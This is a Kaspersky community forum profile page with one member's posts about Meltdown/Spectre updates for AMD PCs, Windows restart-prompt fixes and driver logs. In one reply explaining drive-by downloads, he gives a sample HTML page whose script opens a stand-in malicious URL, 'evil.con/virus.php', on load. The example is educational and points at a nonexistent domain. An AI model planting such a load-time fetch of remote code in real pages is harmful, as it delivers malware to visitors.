Jump to content

GregLauver

Members
  • Content Count

    71
  • Joined

  • Last visited

1 Follower

About GregLauver

  • Rank
    Candidate

Recent Profile Visitors

1,034 profile views
  1. I just thought of something easier that is less dependent on the OS version:

    Click the Start button > Command Prompt > type VER and tap the Enter key

    1. Show previous comments  1 more
    2. GregLauver

      GregLauver

      Sorry for the delayed response; the K Forum did not relay your PM, so I didn't notice it until someone updated the Meltdown/Spectre topic.

      Whether or not Kaspersky can protect us may depend upon how some jester might try to exploit the vulnerability; but I'm guessing K would not see it.  Here is why I think that.

      At the lowest level, you have hardware: the chassis, connectors, wires, gears, doors, capacitors, resistors, transistors (chips), drives - all the stuff you can physically handle and weigh.  But all this is just inert paperweights unless there is a way to make it respond to your Intent.

      That begins to happen in firmware, an electromechanical bridge which can pass simple instructions and responses between hardware and the operating system; but we're still not "there" yet.

      In order to avoid the need to create a specific OS for each hardware configuration (imagine infinite incompatibility), a more generic OS can learn enough about the hardware to create a hardware abstraction layer, a way of packaging specifics about similar devices so the OS can use whatever capabilities an optical drive may have without being hard-coded for those specifics.  Think of the HAL as virtual hardware:  it's usable in every way that hardware is used, and it makes the hardware echo what it's doing, but it's a ghost like everything above it (simply encoded ideas and instructions).

      The operating system is the interface, more or less, between the machine and you (and the world); although, recently, an OS is more often used as a smart platform for applications (apps , a.k.a. software) which in turn interface between the internals and you (and the world), because the internals (that retain market share) have generally become stable and reliable.

      So your computer is a stack of layers: hardware, firmware, OS and HAL, apps, (you,) network.  If each is properly designed:  Apps can sense the OS and control it to varying degrees.  The OS can sense and control firmware and apps.

      Kaspersky (and other vendors) provides security apps (software) designed to defend your OS and good apps from bad apps; i.e. they protect the system at the OS layer and outward (discounting human error).

      Meltdown is a flaw in the basic hardware; so instead of asking you to wait until a flaw-free hardware CPU is available, and then to either replace the flawed CPU or buy a new computer because the new CPU is incompatible with existing hardware (and firmware, OS, etc), the CPU makers are providing new firmware that "works around" the flaw so it cannot be exploited.  This in turn makes it necessary to adapt the ephemeral layers above firmware to accommodate it.

      So the reason you have not seen the answer, in the form that you were expecting, is that the answer is basic "Computer 101" stuff which would be considered "off-topic" in the K Forum for various reasons ...

      First, the Forum is mainly for helping people with K product issues under ordinary circumstances.  Meltdown/Spectre are extraordinary circumstances outside of Computer 101 (let alone the main purpose of the Forum), about which too little is generally known - resulting in wild speculation and nonsense (or at least off-topic) posts.

      Second (as you have probably observed), if someone begins sharing Computer 101 stuff in any forum, it becomes a magnet for a gaggle of neophytes wanting free help for anything from printer paper jams, to Twitter feeds, BSODs, car insurance, and origami.  When all of that is well-stirred, then come the posts claiming "My uncle's sister's boyfriend's mother's landlord's ugly dog made $20T last month working from home on his computer. Click here."

      Third, on most computer-related fora, there is usually a clique of members - tech gurus in their own minds - who would either be indignant about the asking or answering of "childish" questions, or would swagger into their own off-topic-land with a flurry of debate and "oneupmanship".

      Fourth, there is a very limited supply in this world of people who possess enough altruism, knowledge, levelheadedness, patience, stamina, and tolerance to be forum moderators.  With effort extensive and real, and reward bordering on imaginary, you can bet the forum guidelines will be straight and narrow.

    3. mikethebike

      mikethebike

      Thanks Greg for your reply which was both amusing and a little harrowing at the same time. I can understand why richbuff stopped the thread for a while. It was getting away from K related items. I had quite quickly found my processor type and model thanks to one reply and that, as far as being unrelated to K instruction was concerned,  was that but the diversion took on a life of its own unfortunately.

      My continuing issue is: I have no idea despite extensive searches on the internet as to whether I have the correct patch from Microsoft that prevents Spectre. I have an AMD processor which apparently is not vulnerable to Meltdown.

      I certainly have one of the two Microsoft KB files mentioned by Gniblett for Windows 7( my OS) but I am unsure if I am waiting for Microsoft to supply another update for AMD processors. When this update arrives will it be obvious that it is aimed at Spectre by its title?

      In the photo-copied attachment supplied by Gniblett there was mention of having to go to the processor maker, presumably in my case AMD and also upload fresh drivers as well. In other words the Microsoft patch by itself when it arrives and assuming it has not arrived yet, will not be full protection and I have to do some work myself. 

      I have looked at the AMD site and found it impossible to work out what I needed to seek for. It may be that at this stage AMD is still working on the issue so there is nothing there yet but I could find no reference to its schedule on its range of AMD processor and Spectre cures.

      I don't surf the Net, don't go to strange sites, don't open unknown attachments etc so it may be that my chances of being hit are remote. It was difficult to work out quite how much I should worry. My only real vulnerability, like almost all the population today, is online banking and I use K Safe Money there but how much protection it gives against Spectre I have no idea.

      mikethebike

       

    4. GregLauver

      GregLauver

      I just read your last message.  Keeping in mind that most of my time is devoted to keeping my 99yo mom (with all expected ailments) on-planet, I will see what I can find.  It will help if you collect specs on your processor, OS version, AMD's website address, and whatever else you've got in one place to reduce "detective" work.  We can also skip delays-by-happenstance by going to email.  Mine is GregLauver(at)msn.com - please use it only for 1-1 coms (no group messaging) and share it with no one.  Make sure your first email begins with "mikethebike" in the greeting line.

      About your safe-browsing habits:

      Your chances of being hit are remote on most days on the sites on which you have not yet been bitten.  Not to induce panic, but ostensibly good sites may use ad rotators, which commonly serve ads from third-party sites (generally trusted by the second parties that you trust), which in turn may get them from (possibly trustworthy) fourth parties, etc, and you can see where this is going.

      It has already been news (I'm currently too lazy to look it up) that malware has bubbled up through the ad-chain into some of those little few-square-inches side-bar ads on otherwise trusted sites, and whacked people.  A beneficial result (the news was huge and ugly) is that the trusted sites have become far more careful in vetting the ads they serve from external sources; but "nobody is perfect" (and I am a nobody, therefore I am perfect).  And this is why we each still need our own personal fences and guard dogs.

      Can you get infected if you don't click stuff?  Yes, it's called a "drive-by download", and the web page code might look like this:

      
      	<html>     <!-- Web pages are made of HTML elements coded as "<tags>". -->
      
      	    <head> <!-- When you load a page, its contents run in your browser. -->
      
      	        <script>
      
      	            // JavaScript code could open malware file "virus.php"
      
      	            // (but you're safe because .CON does not exist).
      
      	            window.open('http://evil.con/virus.php');
      
      	        </script>
      
      	    </head>
      
      	    <body>
      
      	        The Body typically contains what you see on-page. If you were to copy this chunk of code from &lt;HTML&gt; to &lt;/HTML&gt; into file "test.html" on your desktop, and then double-click it, this paragraph would appear in your default browser, and there might also be an error message saying that evil.con failed to load (if your browser is set to display all errors). You can see the code behind most web pages by right-clicking an empty spot in the page and then selecting "View Source" from the context menu. Yes, it looks awful on the inside, unless you like code.
      
      	    </body>
      
      	</html>
      
  2. @mikethebike - Microsoft has already determined that KIS is compatible. You've been awaiting an OS update that is compatible with your AMD processor. I notice the link in my previous post now redirects to the renamed article: https://support.microsoft.com/en-us/help/4073707/windows-operating-system-security-update-for-amd-based-devices that begins "Microsoft has now resumed updating all AMD-based devices ..." - and updated 2018/01/24 Did Microsoft update you on the sly? Settings > All Settings > System > About > look at Windows Specifications If the version is 1709 and the OS Build is 16299.192, then you're good. If not ... Have you tried manually running Windows Update? Settings > All Settings > Update & Security > Check For Updates If there's still no joy, we can look at your Windows Registry after you've had lots of rest and coffee, in that order. You could actually do this yourself based on notes earlier in this topic; but if you're unfamiliar with the registry and the dire warnings that go with it, then you should wait for guidance or a get trusted assistant.
  3. This article may be useful, and may even be kept current: "Windows operating system security update block for some AMD based devices" https://support.microsoft.com/en-us/help/4073707/windows-os-security-update-block-for-some-amd-based-devices
  4. @mikethebike Follow Action Center (normally at the right end of your taskbar) > All Settings > System > About > look at Processor Be aware: W7 is affected just because it runs on an affected processor.
  5. News: "Microsoft halts AMD Meltdown and Spectre patches after reports of unbootable PCs - blames AMD's documentation" https://www.theverge.com/2018/1/9/16867068/microsoft-meltdown-spectre-security-updates-amd-pcs-issues For now, Microsoft is preventing AMD PCs from receiving updates and becoming unbootable.
  6. This is not "the issue". When I looked at the machine I use constantly (which is therefore updated constantly), its registry HKLM subkey had both the correct value and its own cadca5fe... subKey by the same name. Then I became curious and fired up my notebook to look at the registry, and found what you described. Since it had not been updated for a few days, KIS2018(f) complained that it was out of date; so I ran its update, rechecked the registry, and found the correct value newly added.
  7. @JGAta2 - This issue was discovered at least a couple of months ago; it's now "breaking news" only to the public. Some lag may have been added to accommodate third-party security vendors, or Kaspersky's January 9 estimate may have been based on intel available on December 29. In any case ... (1) There is no evidence that this issue has yet been exploited in the wild. (2) Given the chaos and the scale of the rapid responses, it seems too soon to assume that applications and/or promises have been broken. Give it some time.
  8. To later posters who are worried about not getting a Windows Update yet: drgaz gave you a good answer in the second post at the top. Read https://support.kaspersky.com/14042 and expect your Windows Update no sooner than January 9.
  9. I've got KIS v18.0.0.405(d). You can wait for an official solution, if the messages don't bother you too much; else you can try the solutions posted in this topic.
  10. I did not try his method on my x64s because my earlier method (MS Disk Cleanup + System Files) worked for them; but not on my x86, where his method also did not work. That led me to carefully reconsider the evidence, and then to the Windows Notifications for the Settings app, and simply turning it off and back on. (No need to turn off KIS features, or reinstall KIS, or reinstall my OS. Did not even need to reboot.) By itself (without any other method), neither closing the message in the Action Center, nor rebooting - either separately or together - will stop the reappearance of the nagging prompt. This is basically why people are frustrated: these are the most obvious courses of action, and they don't help.
  11. The issue appeared in 3 PCs: after auto-update of KIS2017 v17.0.0.611(e) to KIS2017 v17.0.0.611(f) and after properly reinstalling KIS2017 v17.0.0.611(f); after auto-update of KIS2018 v18.0.0.405(c) to KIS2018 v18.0.0.405(d). Systems and Device Manager Events when updating to v18.0.0.405(d) ________________________________________________________________ 1 PC: Windows 10 Home v=1703 OSbuild=15063.674, 64-bit OS on x64 processor 2017/10/13 05:49:44 Device ROOT\SYSTEM\0002 was deleted. Class Guid: {4D36E97D-E325-11CE-BFC1-08002BE10318} 2017/10/13 05:49:45 Device ROOT\SYSTEM\0002 was configured. Driver Name: oem46.inf Class Guid: {4D36E97D-E325-11CE-BFC1-08002BE10318} Driver Date: 09/30/2017 Driver Version: 13.0.136.62 Driver Provider: Kaspersky Lab Driver Section: klhkInstall Driver Rank: 0xFF0000 Matching Device Id: ROOT\KLHK Outranked Drivers: oem10.inf:ROOT\KLHK:00FF0000 Device Updated: true Parent Device: HTREE\ROOT\0 2017/10/13 05:49:45 Device ROOT\SYSTEM\0002 was started. Driver Name: oem46.inf Class Guid: {4D36E97D-E325-11CE-BFC1-08002BE10318} Service: klhk Lower Filters: Upper Filters: 2017/10/13 05:49:45 Driver Management concluded the process to install driver klhk.inf_amd64_e484f06fdc5d2f4f\klhk.inf for Device Instance ID ROOT\SYSTEM\0002 with the following status: 0x0. ________________________________________________________________ 1 PC: Windows 10 Home v=1703 OSbuild=15063.674, 64-bit OS on x64 processor 2017/10/14 03:39:44 Device ROOT\SYSTEM\0002 was deleted. Class Guid: {4D36E97D-E325-11CE-BFC1-08002BE10318} 2017/10/14 03:39:46 Device ROOT\SYSTEM\0002 was configured. Driver Name: oem14.inf Class Guid: {4D36E97D-E325-11CE-BFC1-08002BE10318} Driver Date: 09/30/2017 Driver Version: 13.0.136.62 Driver Provider: Kaspersky Lab Driver Section: klhkInstall Driver Rank: 0xFF0000 Matching Device Id: ROOT\KLHK Outranked Drivers: oem4.inf:ROOT\KLHK:00FF0000 Device Updated: true Parent Device: HTREE\ROOT\0 2017/10/14 03:39:47 Device ROOT\SYSTEM\0002 was started. Driver Name: oem14.inf Class Guid: {4D36E97D-E325-11CE-BFC1-08002BE10318} Service: klhk Lower Filters: Upper Filters: 2017/10/14 03:49:47 Driver Management concluded the process to install driver klhk.inf_amd64_e484f06fdc5d2f4f\klhk.inf for Device Instance ID ROOT\SYSTEM\0002 with the following status: 0x0. ________________________________________________________________ 1 PC: Windows 10 Pro v=1703 OSbuild=15063.674, 32-bit OS on x64 processor 2017/07/26 23:15:00 Device ROOT\SYSTEM\0002 was deleted. Class Guid: {4D36E97D-E325-11CE-BFC1-08002BE10318} 2017/10/15 15:17:57 Device ROOT\SYSTEM\0002 was configured. Driver Name: oem25.inf Class Guid: {4D36E97D-E325-11CE-BFC1-08002BE10318} Driver Date: 09/30/2017 Driver Version: 13.0.136.62 Driver Provider: Kaspersky Lab Driver Section: klhkInstall Driver Rank: 0xFF0000 Matching Device Id: ROOT\KLHK Outranked Drivers: oem5.inf:ROOT\KLHK:00FF0000 Device Updated: true Parent Device: HTREE\ROOT\0 2017/10/15 15:17:57 Device ROOT\SYSTEM\0002 was started. Driver Name: oem25.inf Class Guid: {4D36E97D-E325-11CE-BFC1-08002BE10318} Service: klhk Lower Filters: Upper Filters: 2017/10/15 15:17:57 Driver Management concluded the process to install driver klhk.inf_x86_e5bd40572cc65047\klhk.inf for Device Instance ID ROOT\SYSTEM\0002 with the following status: 0x0. END
  12. Alternate solution: If we look at the screenshot in @NeatNit's post here: showing we see that the prompt is actually issued by Windows 10's Settings. If it were issued by Kaspersky, the prompt would instead be preceded by the K logo (unless you have disabled icons in notification settings). Briefly: My previous solution worked on my Windows 10 Home 64bit PCs, but none of the contributors' solutions in this topic worked on my Windows 10 Pro 32bit PC. I began to get the feeling that the driver for Power Events Provider had already installed correctly, but the prompt to restart had simply not been removed (cancelled) after successful installation. I checked Start > Device Manager > View > Show Hidden Devices > System Devices > Kaspersky Lab Power Events Provider > Properties > Events tab > and yes, the driver was successfully installed during my most recent installation of Kaspersky. So I opened Action Center > All Settings > System > Notifications & Actions > scroll below "Get notifications from these senders" to Settings > click to disable > click to enable > done. And the offending prompt is gone.
  13. This topic now spans 2 pages, wherein the mods have recommended that you provide a GSI report and other users have offered 4 different solutions, none of which involve the hassle and disruption of reinstalling your OS. Please study both pages of this topic and try what has been recommended.
  14. That is correct: for users who have this problem, the message persistently returns. It may go away for a few seconds or minutes, but then it returns.
  15. The converse is true: Fast Start substitutes Hybrid Sleep for a real Shutdown. Restarts, manual or not, go completely down. Reference: howtogeek.com/243901/the-pros-and-cons-of-windows-10s-fast-startup-mode/
×
×
  • Create New...

Important Information

We use cookies to make your experience of our websites better. By using and further navigating this website you accept this. Detailed information about the use of cookies on this website is available by clicking on more information.